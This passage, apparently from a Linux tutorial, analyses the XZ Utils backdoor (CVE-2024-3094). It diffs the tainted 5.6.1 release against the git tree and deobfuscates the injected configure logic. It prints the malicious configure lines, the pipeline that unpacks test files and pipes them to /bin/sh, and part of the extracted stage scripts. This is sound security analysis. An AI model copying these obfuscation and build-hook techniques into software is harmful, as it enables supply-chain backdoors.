Then we can iteratively run the build configuration program to satify the build requirement and finally, generating the Makefile to actually build and install the software. Run the following command to do so:

./configure

First of all, the build configuration program complained about missing C compiler:

configure: error: no acceptable C compiler found in $PATH

which can be fixed by installing a compatible C compiler like GCC, install it by running the following command as root:

apt install gcc

We can now retry the build confiugration program by running the following command:

./configure

This time the build configuration should be completed without errors


    ...stripped...

config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
root@cve-2024-3094:/project/libtool-git# echo "${?}"
0
root@cve-2024-3094:/project/libtool-git# 

Now we can start building the GNU Libtool software by running the following commands:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

if the command's exit status code is zero it means that the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Libtool software to the system:

make install

After the installation of the GNU Libtool software you should have the libtool command in your command search PATHs(/usr/local/bin). You may check the version of the installation by running the following command:

libtool --version

Let's run the following command to switch the working directory back to the initial one as we have no business to do with the GNU Libtool source tree anymore:

cd /project

GNU Gettext

The installation of the 0.22.4 version of the GNU Gettext software can be started by locating the download URL of the 0.22.4 version GNU Gettext release archive and its respective PGP signature file and download them to the working directory using your web browser.

Then, as usual, verify that the release archive we downloaded are actually made by one of the GNU Gettext project maintainers. We can determine who have actually signed the release archive by running the following commands:

gpg_opts=(
    # Verify the authenticity of the gettext-0.22.4.tar.lz file using
    # the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg:                using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring, we can retrieve the public key using the key's ID from the previous output by running the following commands:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian(hkps://keys.openpgp.org),
    # , however, it doesn't work reliably during the writing of this
    # tutorial thus the other popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"

It should have the following output:

gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1

Note:

If you still can't successfully retrieve the public key it might be the connection has been blocked by your network's firewall, you could also try using the hkp://keyserver.ubuntu.com:80 keyserver which should get through the hostile networking environment.

As shown by the GNU Gettext project group memberlist page, Bruno Haible <bruno@clisp.org> is indeed the one of the GNU Gettext project maintainers, so the public key we've fetched here is probably legit:

Screenshot of the "Active members on duty" section of the GNU Gettext project group member list page, group administrator Bruno Haible can be found in the list

We can now proceed to verify the 0.22.4 version of the GNU Gettext release archive:

gpg_opts=(
    # Verify the authenticity of the gettext-0.22.4.tar.lz file using
    # the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
    # signer's PGP public key in your keyring)
    --verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicate that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

Before we extract the 0.22.4 version of the GNU Gettext release archive, we need to install the required software to extract lzip-compressed tar archive files(as depicted by the .lz filename extension) by running the following commands as root:

lzip_decompress_dependency_pkgs=(
    lzip
)
apt install "${lzip_decompress_dependency_pkgs[@]}"

We can now proceed to extract the 0.22.4 version of the GNU Gettext release archive, run the following commands to do so:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"

Now we can try building the 0.22.4 version of the GNU Gettext software from source. According to the installation document (gettext-0.22.4/INSTALL), the build procedure is similar to the other GNU build system components, though the build configuration program is already shipped in the release archive so we can directly use that to configure our build.

As the build configuration program(gettext-0.22.4/configure) will create build files in your working directory let's switch the working directory into the GNU Gettext 0.22.4 source tree to avoid writing files outside of it:

cd gettext-0.22.4

Then we can iteratively run the build configuration program to satify the build requirement and finally, generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

if the command's exit status code is zero it means that the build configuration is successful. Run the following command right after the ./configure command's invocation to verify it:

echo "${?}"

Now we can start building the GNU Gettext software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the
    # same time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

if the command's exit status code is zero it means that the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Gettext software to the system:

make install

After the installation of the GNU Gettext software you should have the gettext command in your command search PATHs(/usr/local/bin). You may check the version of the installation by running the following command:

gettext --version

Let's turn our heads back to the initial working directory as we have no longer have business to do with the GNU Gettext source tree anymore:

cd /project

Generate the build system files

Now that the software dependencies are installed, let's start generate the build system files as in the project maintainers role.

As the XZ Utils autogen.sh program require us to have the working directory set to the checked-out source directory and for not polluting XZ Utils build artifacts outside of its directory, run the following command to make the working directory switch:

cd xz-git

and run the following command to build the build system files:

./autogen.sh

which will errored with the following message:

po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.

We can search for packages that provide the po4a program by using the aforementioned apt-file utility by running the following commands:

apt_file_search_opts=(
    # Specify that the search pattern is a regular expression instead
    # of a glob pattern
    --regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'

Which should have the following output, indicating that there's a same-name package that provides such program:

po4a: /usr/bin/po4a

We can satisfy the dependency by running the following commands as root:

apt install po4a

The next iteration of the ./autogen.sh command prints the following error message:

doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.

which we can again, use the apt-file utility to locate the package that provides that program to install. We leave this step to you and simply satisfy the resulting dependency package by running the following command as root:

apt install doxygen

This time the ./autogen.sh command invocation should have the following output, indicate that it has successfully generated all the files:

Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0

Let's return to the initial working directory as the further operation don't need the current one by running the following command:

cd /project

Comparing the difference between the clean source tree and the tainted release archive

According to the oss-security mailing list discussion thread, it is the build system files that is not in the upstream Git repository that is modified to contain the logic to extract the malicious object code file from the test data.

For the ease of comparing differences, let's install a helper utility that supports plaintext data syntax highlighting: bat: A cat(1) clone with wings. We can install it by running the following commands as root:

apt install bat

Note:

Due to a command name conflict the bat command shipped in older versions of Debian and it's derivatives are renamed to batcat. To increase the interoperability with other GNU/Linux distributions let's rename it back to the upstream name by running the following commands as root:

dpkg_divert_opts=(
    # Rename the file to /usr/bin/bat
    --divert /usr/bin/bat
    
    # Do the actual rename operation, as the package is already
    # installed
    --rename
    
    # Add a new diversion for the package installed
    # /usr/bin/batcat file
    --add /usr/bin/batcat
)
dpkg-divert "${dpkg_divert_opts[@]}"

We can generate the content differences between the checked-out 5.6.1 version from the Git repository and the potentially evil-actor prepared 5.6.1 version source tree and save it to a file by running the following commands:

diff_opts=(
    # Use the unified diff format
    --unified
    
    # Exclude files that we aren't interested: #
    # Software documentation
    --exclude='ChangeLog'
    --exclude='doc'
    
    # Translation files
    --exclude='*.po'
    --exclude='*.pot'
    --exclude='*.gmo'
    --exclude='po4a'
    
    # Git repository
    --exclude='.git'

    # Compare recursively between two directory trees
    --recursive
)
# Generate the unified diff of the git versus released XZ Utils 5.6.1
# source tree, and redirect the output to the 
# xz-vanilla-vs-tainted.diff diff file
diff "${diff_opts[@]}" xz-git xz-5.6.1 >xz-vanilla-vs-tainted.diff

Here's the reference result.

Note:

The >_file_ part of the diff command is in the output redirection syntax of the Bash scripting language, which saves the content from the standard output device of the command to the specified file.

By using this feature we can avoid piping the output directly to the bat utility, which in this case won't be able to apply the syntax highlighting unless we explicitly specify what --language the input data is in.

Then we can run the following commands to inspect the content differences:

bat xz-vanilla-vs-tainted.diff

you should be able to see the following output:

Content difference inspection using the  pager utility

Note:

By default the bat utility will launch the less pager on data that is over a terminal size, thus the keybindings supported by the less pager can be used, including but not limited to the following:

  • Press the q key to exit the pager program.
  • Press the g key to jump to the first line of the file.
  • Press the G key to jump to the last line of the file.
    • Key-in the number of lines to jump, then the G key to jump to the specific line(due to the additional formatting caused by bat, it may not be the exact line that you intend to jump).
  • Press the / j key to move down a line.
  • Press the / k key to move up a line.
  • Press the Page Up(Pgup) key to move up a page.
  • Press the Page Down(Pgdown) key to move up a page.

Extract the injected object file from the test file

For the content differences we can notice that the tainted XZ Utils 5.6.1 release source tree has its build configuration program and the m4/build-to-host.m4 M4 macro file modified to contain suspicious logic, where the former one is generated by the latter one by GNU Autoconf.

Unfortunately, we aren't experts in reading M4 macros so we shall temporary put them aside and only analyse the resulting build configuration program as it is in a much readable bourn shell compatible shell script format. Let's analyse the build configuration script in a top-to-down manner.

Note: About the unified diff format:

  • The lines started with --- indicate the file before the modification.
  • The lines started with +++ indicate the file after the modification.
  • The lines started with @@ marks a start of a hunk(and the end of a previous hunk, if exists).
    • The integer pairs in the hunk marker lines indicate the beginning line number and line count of the hunk in the file, where the one prepended by a hyphen-minus character(-) indicate the file before modification and the one prepended by a plus character(+) indicate the file after modification
  • The hunk lines started with a space character( ) indicate the lines aren't changed between the modification.
  • The hunk lines started with a plus character(+) indicate the lines are inserted after the modification.
  • The hunk lines started with a hyphen-minus character(-) indicate the lines are removed after the modification.

Take the following diff hunk as an example:

--- xz-git/build-aux/config.sub 2024-04-11 22:31:56.587698017 +0800
+++ xz-5.6.1/build-aux/config.sub   2024-03-09 16:16:40.000000000 +0800
@@ -1748,7 +1753,8 @@
         | skyos* | haiku* | rdos* | toppers* | drops* | es* \
         | onefs* | tirtos* | phoenix* | fuchsia* | redox* | bme* \
         | midnightbsd* | amdhsa* | unleashed* | emscripten* | wasi* \
-        | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr*)
+        | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr* \
+        | fiwix* )
        ;;
    # This one is extra strict with allowed versions
    sco3.2v2 | sco3.2v[4-9]* | sco5v6*)

This diff hunk featuring line 1748 to 1754 of the xz-git/build-aux/config.sub(7 lines in total, including the line 1751 which is removed after modification), corresponding to line 1753 to 1760 of the xz-5.6.1/build-aux/config.sub file(8 lines in total, including the line 1756 and 1757 which are inserted after modification).

Refer Detailed Description of Unified Format | GNU Diffutils manual for more information.

Note:

In case you need another terminal window to read the full file, you can get another container shell by run the following command as root in a separate terminal window:

docker_exec_opts=(
    # Allow bash interactive mode to properly function
    --interactive
    --tty
)
bash_opts=(
    # Launch a login shell that reads the user's configuration files
    --login
)
docker exec "${docker_exec_opts[@]}" cve-2024-3094 \
    bash "${bash_opts[@]}"

Let's examine the next hunk of the build configuration program:

@@ -18683,8 +18683,16 @@
 
 
 
+      gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
   gl_sed_escape_for_make_2='s,\$,\\$$,g'
       case `echo r | tr -d '\r'` in

The 18686 line assigns the gl_am_configmake variable with the standard output of the following command:

grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null

Note:

The `command` portion of the command is in the aforementioned Bash scripting language's command substitution syntax, but is a deprecated format of $(command).

We can expand the command as the following commands:

# Seems to be expanded to the source tree directory's path
srcdir=xz-5.6.1
grep_opts=(
    # -a: Process a binary file as if it were text
    --text
    
    # -E: Specify the search pattern is an extended regular
    # expression(ERE)
    --extended-regexp
    
    # -r: Read and process all files in the specified directory
    # recursively
    --recursive
    
    # -l: Suppress normal output, only print the name of the input
    # file that have successfully matched the specified search
    # pattern
    --files-with-matches
    
    # -s: Suppress error messages regarding nonexistent or unreadable
    # files
    --no-messages
)
grep "${grep_opts[@]}" "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null

The #{4}[[:alnum:]]{5}#{4} (POSIX) extended regular expression matches any strings that has the following elements in the following order:

  1. 4 consecutive pound signs(#{4})
  2. 5 consecutive characters that is in the set of alphabet letters and numbers([[:alnum:]]{5})
  3. 4 consecutive pound signs(#{4})

Running the command will reveal the assigned variable value to be:

xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz

This is already alarming as the software testing data file shouldn't have business to do with the software build itself.

The if block at line 18687~18691 checks whether the gl_am_configmake variable is a non-null string(whether the grep command can match the special search pattern in the software source tree) and assigns the HAVE_PKG_CONFIGMAKE variable to 1 when it is. This is likely to avoid the build configuration program errors when the maliciously crafted test data does not exist in the source tree for any reason (like the file being removed in a future time), which may attract people's attention.

Note:

People that is familiar with the build configuration program generated by GNU Autoconf may notice that the if condition uses a test feature (-n) that is not normally used in a build configuration program due to shell compatibility(we will notice the proper way to do so in the following sections). This increases the suspiciousness of the change.

The line 18695 assigns the tr "\t \-_" " \t_\-" string to the gl_path_map variable, which seems to be a tr command camouflaged to translate some data using the following rules:

  • Replace the tab character(\t) to a space character.
  • Replace the space character( ) to a tab character.
  • Replace the hyphen-minus character(\-) to a underscore character.
  • Replace the underscore character to a hyphen-minus character.

Then, for the following difference hunk:

@@ -19875,6 +19883,7 @@
 
 
     gl_final_localedir="$localedir"
+  gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
     case "$build_os" in
     cygwin*)
       case "$host_os" in

The wrongly indented 19886 line:

gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`

assigns the gl_localedir_prefix variable to the output of the following command:

echo $gl_am_configmake | sed "s/.*\.//g"

, which, after the parameter expansion and quotre, becomes:

echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"

This command essentially calls the sed plaintext data manipulation utility to do a search & replace:

  • Search all occurrences that matches the .*\. basic regular expression.
    • The .* basic regular expression pattern matches zero or more occurrences of the . RE pattern(which matches any single character).
    • The \. basic regular expression pattern matches a literal . character.
  • Replace matched occurrences to a null string(essentially removing them).

, which filters out the xz filename extension portion from the xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz filename, as you can noticed in the later section it is a sneaky way to insert the xz command call.

Note:

The \. substring in the "s/.*\.//g" double-quoted string expands to literal \. instead of . due to the following behaviors documented in the Bash reference manual:

  • The backslash retains its special meaning only when followed by one of the following characters: ‘$’, ‘`’, ‘"’, ‘\’, or newline.
  • Within double quotes, backslashes that are followed by one of these characters are removed. Backslashes preceding characters without a special meaning are left unmodified.

Let's examine the next hunk of the build configuration program, which strangely features a big chunk of blank lines:

@@ -19891,6 +19900,34 @@
       if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
     localedir_c_make='\"$(localedir)\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+  else
+    gl_localedir_config=''
+  fi

    ...stripped...
    
+          ac_config_commands="$ac_config_commands build-to-host"
 
 
   localedir="${gt_save_localedir}"

The 19903~19907 if block checks whether the gl_am_configmake variable's value is not a null string(essentially the -n option of the test command used in the aforementioned hunk).

Note:

This is what a GNU Autoconf-generated build configuration program would normally do in order to check whether a string is not null, as opposed to using the -n command-line option of the test builtin command mentioned previously.

When the variable's value is not a null string, it sets the gl_localedir_config variable to the following single-quoted string:

sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null

We'll keep this string unprocessed for now until it is actually evaluated by the shell interpreter.

The 19930 line appends the build-to-host string to the ac_config_commands variable, which, seems to be define a GNU Autoconf build configuration command that will be run at the end of the build configuration. I'm not entirely sure what effect does it create so let's just leave this one at the moment.

For the next diff hunk:

@@ -23884,6 +23921,11 @@
 enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$del
ay_single_quote_subst"`'
 old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`'
 striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`'
+gl_path_map='`$ECHO "$gl_path_map" | $SED "$delay_single_quote_subst"`'
+gl_localedir_prefix='`$ECHO "$gl_localedir_prefix" | $SED "$delay_single_qu
ote_subst"`'
+gl_am_configmake='`$ECHO "$gl_am_configmake" | $SED "$delay_single_quote_subst"`'
+localedir_c_make='`$ECHO "$localedir_c_make" | $SED "$delay_single_quote_subst"`'
+gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
 LD_RC='`$ECHO "$LD_RC" | $SED "$delay_single_quote_subst"`'
 reload_flag_RC='`$ECHO "$reload_flag_RC" | $SED "$delay_single_quote_subst"`'
 reload_cmds_RC='`$ECHO "$reload_cmds_RC" | $SED "$delay_single_quote_subst"`'

The 23924~23928 line do some sort of the translation to the content of the previously defined variables using an sed expression that is defined in the line 8403~8404 as the following:

# Sed substitution to delay expansion of an escaped single quote.
delay_single_quote_subst='s/'\''/'\'\\\\\\\'\''/g'

After the script interpreter's escape character interpretation and quote removal the actual sed expression can be determined to be:

s/'/'\\\''/g

According to the s command section of the GNU sed manual, only the \\ substring in the replacement portion of the s sed command is treated as a escape sequence and is interpreted as a single backslash character(\). As the result the sed expression will search for every occurrences of the single-quote character in each input line and replacing it to '\\''

This operation seems to be GNU Autoconf workarounding the shell interpreter behaviors and is not related to the backdoor itself, we'll ignore it as of now.

Line 19896 assigns the value of the gl_localedir_config to the following command: which seems to be a shell command pipeline that can be further expanded to:

sed \"r\n\" xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
    | tr "\t \-_" " \t_\-" \
    | xz -d 2>/dev/null

I won't able to figure out what the weird sed command do so I simply look it up for now. According to Daniel Feldman the sed command is essentially a disguised cat that simply outputs the content of the bad-3-corrupt_lzma2.xz file to the rest of the pipeline, which does the aforementioned character translation and decompress the result using the xz utility.

What does it extracts to? A shell script!

####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Let's ignore the multiple attempts to terminate the script when the Operating system isn't Linux, in the next portion of the commands:

if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi

the script attempts to locate the root directory of the XZ Utils source tree via the srcdir variable set in the config.status GNU Autoconf build intermediate file as the build configuration program may not be run in the root directory of the source tree in some software build scenarios(like in distribution packaging).

In the last portion of the script commands the following commands are executed:

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | eval $i \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

Smells like another round of code/data obfuscation, let's divide and conquer the command pipeline.

In the first component of the command pipeline:

srcdir="xz-git"
xz_opts=(
    # Decompress compressed data
    --decompress
    
    # Output decompressed data to the standard output
    # device
    --stdout
)
xz "${xz_opts[@]}" "${srcdir}/tests/files/good-large_compressed.lzma"

the script decompresses the seemingly benign tests/files/good-large_compressed.lzma test data to the command's output.

The i shell variable essentially houses a subshell of AND LIST commands to run, after doing the parameter expansion:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
        | eval "((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)" \
        | tail -c +31233 \
        | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

The eval command interprets the following string as a script. It doesn't seem to matter much in this occasion so let's drop it for now:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | (
        (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +939
    ) \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    | /bin/sh

As the name indicates, the subshell markup launches another shell interpreter process as the current shell shell interpreter's sub-process, and run the enclosed commands inside that process. The shell interpreter will receive the output from the previous component of the command pipeline, process it using the commands in the sub shell, then output them to the standard output device(stdout), which is then redirected as the standard input(stdin) data of the next component in the pipeline.

The subshell commands simply:

  1. Drop(>/dev/null) 1,024 bytes of the the start of the data stream.
  2. Output 2,048 bytes of the start of the data stream.
  3. Repeat 1. and 2. 16 times.
  4. Drop(>/dev/null) 1,024 bytes of the the start of the data stream.
  5. Output 939 bytes of the start of the data stream.

The next shell pipeline component:

tail_opts=(
    # Output the content starting with the 32133 byte of the input file
    --bytes +31233
)
tail "${tail_opts[@]}"

filters the bytes before the 32133 byte.

The next shell pipeline component:

tr \
    "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
    "\0-\377"

shuffles the data that contains

The next shell pipeline component:

xz_opts=(
    # Decompress compressed data
    --decompress
    
    # Decompresses a _raw_ LZMA1 stream
    --format raw
    --lzma1
    
    # Output decompressed data to the standard output
    # device
    --stdout
)
xz "${xz_opts[@]}"

Decompresses the data by assuming the data is a raw LZMA1 stream, which is a very specific decompression parameter combination.

By running the pipeline but instead of piping to /bin/sh, redirect the output to a file we can retrieve the deobfuscation result:

(
    xz -dc $srcdir/tests/files/good-large_compressed.lzma \
    | (
        (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +2048 \
            && (head -c +1024 >/dev/null) \
            && head -c +939
    ) \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
    | xz -F raw --lzma1 -dc \
    > good-large_compressed.deobfuscated

Surprise, surprise! Another shell script!

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS

    ...stripped...

This time it's also a heavily obfuscated shell script as well, discourage researchers for digging deeper into the abyss.

As analysing the script requires deep understanding of the following subjects I have to give up and just look for answers from other people now:

  • AWK
  • GCC
  • GNU ld
  • glibc
  • libtool

I would suggest checking out the research!rsc: The xz attack shell script article by Russ Cox who have explains what the segments in this script (may) do.

Credits

The following, included but not limited, people helps during the writing of this tutorial:

References

During the writing of this tutorial, the following third-party materials are referenced:


This work is released under Public Domain, refer the workspace homepage for more details.

This work is initially written by 林博仁(Buo-ren Lin), attributions will be appreciated.